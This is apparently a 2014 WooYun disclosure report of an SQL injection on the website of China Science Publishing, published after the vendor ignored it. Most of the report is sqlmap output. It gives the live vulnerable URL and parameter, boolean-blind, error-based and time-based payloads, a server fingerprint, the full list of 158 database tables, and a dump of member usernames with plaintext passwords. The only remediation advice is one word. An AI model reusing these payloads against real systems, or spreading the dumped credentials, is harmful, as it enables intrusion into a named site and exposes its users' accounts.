当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2014-080329

漏洞标题:中国科学出版社SQL注入漏洞可导致数据泄漏

相关厂商:中国科学出版社

漏洞作者: xxsec

提交时间:2014-10-22 11:04

修复时间:2014-12-06 11:06

公开时间:2014-12-06 11:06

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:12

漏洞状态:未联系到厂商或者厂商积极忽略

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2014-10-22: 积极联系厂商并且等待厂商认领中,细节不对外公开
2014-12-06: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

膜拜猪猪侠,求神器,手工党伤不起·······

详细说明:

1注入点:http://www.sciencep.com/t_second.php?id=798 (GET) (主要是t_second.php文件没过滤)
2

sqlmap identified the following injection points with a total of 296 HTTP(s) requests:
---
Place: GET
Parameter: id
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: id=798 AND 6024=6024
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
Payload: id=798 AND (SELECT 5731 FROM(SELECT COUNT(*),CONCAT(0x7164726671,(SELECT (CASE WHEN (5731=5731) THEN 1 ELSE 0 END)),0x7176786971,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)
Type: AND/OR time-based blind
Title: MySQL < 5.0.12 AND time-based blind (heavy query)
Payload: id=798 AND 9246=BENCHMARK(5000000,MD5(0x704e5a66))
---
web server operating system: Linux CentOS 6.5
web application technology: PHP 5.3.3, Apache 2.2.15
back-end DBMS: MySQL 5.0
available databases [3]:
[*] information_schema
[*] sciencep_db
[*] test


3

sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: id
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: id=798 AND 6024=6024
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
Payload: id=798 AND (SELECT 5731 FROM(SELECT COUNT(*),CONCAT(0x7164726671,(SELECT (CASE WHEN (5731=5731) THEN 1 ELSE 0 END)),0x7176786971,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)
Type: AND/OR time-based blind
Title: MySQL < 5.0.12 AND time-based blind (heavy query)
Payload: id=798 AND 9246=BENCHMARK(5000000,MD5(0x704e5a66))
---
web server operating system: Linux CentOS 6.5
web application technology: PHP 5.3.3, Apache 2.2.15
back-end DBMS: MySQL 5.0
Database: sciencep_db
[158 tables]
+-----------------------------+
| 1discountrate |
| 2order |
| 3orderdetail |
| admininfo |
| article_t |
| ci_sessions |
| classification |
| column_t |
| daorushujibiao |
| department |
| group_list |
| hxhd_addon15 |
| hxhd_addonarticle |
| hxhd_addonflash |
| hxhd_addonimages |
| hxhd_addonsoft |
| hxhd_addonspec |
| hxhd_admin |
| hxhd_admintype |
| hxhd_arcatt |
| hxhd_archives |
| hxhd_arcrank |
| hxhd_arctype |
| hxhd_area |
| hxhd_articles |
| hxhd_banbenshuomingku |
| hxhd_banciku |
| hxhd_baseinfo |
| hxhd_bianjiku |
| hxhd_bianjishuleiku |
| hxhd_bianjizhichengku |
| hxhd_bianjizhiwuku |
| hxhd_cengciku |
| hxhd_channeltype |
| hxhd_chubanzheku |
| hxhd_co_dataswitch |
| hxhd_co_exrule |
| hxhd_co_listenurl |
| hxhd_co_mediaurl |
| hxhd_congshuku |
| hxhd_conote |
| hxhd_courl |
| hxhd_dianjipaihangbang |
| hxhd_dianxiaofenlei |
| hxhd_dianxiaoleibie |
| hxhd_dianxiaopaihangbang |
| hxhd_dianxiaopaihangyiju |
| hxhd_dingdanku |
| hxhd_dingweishuomingku |
| hxhd_download |
| hxhd_duixiangquntiku |
| hxhd_duzheduixiangku |
| hxhd_error |
| hxhd_feedback |
| hxhd_flink |
| hxhd_flinktype |
| hxhd_freelist |
| hxhd_friend |
| hxhd_goushuhuiyuanku |
| hxhd_goushujingli |
| hxhd_guanlifenzuku |
| hxhd_guestbook |
| hxhd_homepageset |
| hxhd_huiyuanjibieku |
| hxhd_huojiangku |
| hxhd_jgkinfo |
| hxhd_jiangxiangku |
| hxhd_jiaoshihuiyuanku |
| hxhd_jiaoshijibie |
| hxhd_jiaoshikuxueke |
| hxhd_jiaoshizhichengku |
| hxhd_jiaoyuchengduku |
| hxhd_jibenxinxi |
| hxhd_jigouku |
| hxhd_jingxiaoshangku |
| hxhd_jxkbook |
| hxhd_kaibenku |
| hxhd_kechengxingzhi |
| hxhd_keywords |
| hxhd_leader_t |
| hxhd_log |
| hxhd_member |
| hxhd_member_arctype |
| hxhd_member_flink |
| hxhd_member_guestbook |
| hxhd_member_operation |
| hxhd_member_time |
| hxhd_member_type |
| hxhd_memberstow |
| hxhd_moneycard_record |
| hxhd_moneycard_type |
| hxhd_moneyrecord |
| hxhd_myad |
| hxhd_mynews |
| hxhd_mytag |
| hxhd_partner |
| hxhd_pinzhongleixing |
| hxhd_plus |
| hxhd_positions |
| hxhd_quickgo |
| hxhd_readerliuyan |
| hxhd_recruitments |
| hxhd_search_keywords |
| hxhd_sgpage |
| hxhd_shangbangzuigaoweiciku |
| hxhd_shenfenku |
| hxhd_shengfenku |
| hxhd_shiyueyangshuyuanyin |
| hxhd_shopsales |
| hxhd_shoukexinxi |
| hxhd_shuleiku |
| hxhd_shupingku |
| hxhd_softconfig |
| hxhd_sysconfig |
| hxhd_syspassport |
| hxhd_tishiwentiku |
| hxhd_tougaoku |
| hxhd_uploads |
| hxhd_vote |
| hxhd_xianxuanjiaocaiyuanyin |
| hxhd_xiazaiku |
| hxhd_xiazaileixingku |
| hxhd_xuekeku |
| hxhd_xueliku |
| hxhd_yizhezerenshuomingku |
| hxhd_yuanbanciku |
| hxhd_zaitixingtaiku |
| hxhd_zdxmjd |
| hxhd_zengyangshuku |
| hxhd_zhengwenyuzhongku |
| hxhd_zhichengku |
| hxhd_zhiwuku |
| hxhd_zhongdaxianmu |
| hxhd_zhongtufafenlei |
| hxhd_zhuangzhenku |
| hxhd_zhuyifangshiku |
| hxhd_zidingyifenlei |
| hxhd_zuoyizheku |
| hxhd_zuozhezerenshuomingku |
| iso_bookinfo_t |
| iso_booktype_t |
| log_book |
| mail_group |
| mail_list |
| mail_template |
| mpshop_tongbu |
| phpqadmin |
| phpqanswer |
| phpqquestion |
| phpqsession |
| phpqsurvey |
| phpquser |
| remit |
| sendfee |
| shouyechangxiaotushubiao |
| shouyexianshibiao |
| udf_temp |
| user_t |
+-----------------------------+


4

漏洞证明:

sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: id
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: id=798 AND 6024=6024
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
Payload: id=798 AND (SELECT 5731 FROM(SELECT COUNT(*),CONCAT(0x7164726671,(SELECT (CASE WHEN (5731=5731) THEN 1 ELSE 0 END)),0x7176786971,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)
Type: AND/OR time-based blind
Title: MySQL < 5.0.12 AND time-based blind (heavy query)
Payload: id=798 AND 9246=BENCHMARK(5000000,MD5(0x704e5a66))
---
web server operating system: Linux CentOS 6.5
web application technology: PHP 5.3.3, Apache 2.2.15
back-end DBMS: MySQL 5.0
Database: sciencep_db
Table: hxhd_member
[19 entries]
+----------------+-----------+
| pwd | uname |
+----------------+-----------+
| 102030 | asdf1234 |
| 111 | das |
| 111 | hfkjsdhkj |
| 111111 | 1212313 |
| 123456 | qwdsa |
| 123456 | 1234441 |
| 1310530 | dsfdsf |
| 1310530 | dsffd |
| aaa | aaa |
| aaaaaa | aassas |
| aaaaaa | dssdssds |
| fengzi | jfsldk |
| fengzi | jfdksl |
| fengzi | dfsjkl |
| hahaha | ga |
| hahaha | haha |
| ttttianttttian | ttttian |
| wltcyb | aaa |
| zcx | zcx |
+----------------+-----------+

修复方案:

过滤

版权声明:转载请注明来源 xxsec@乌云


漏洞回应

厂商回应:

未能联系到厂商或者厂商积极拒绝


漏洞评价:

评论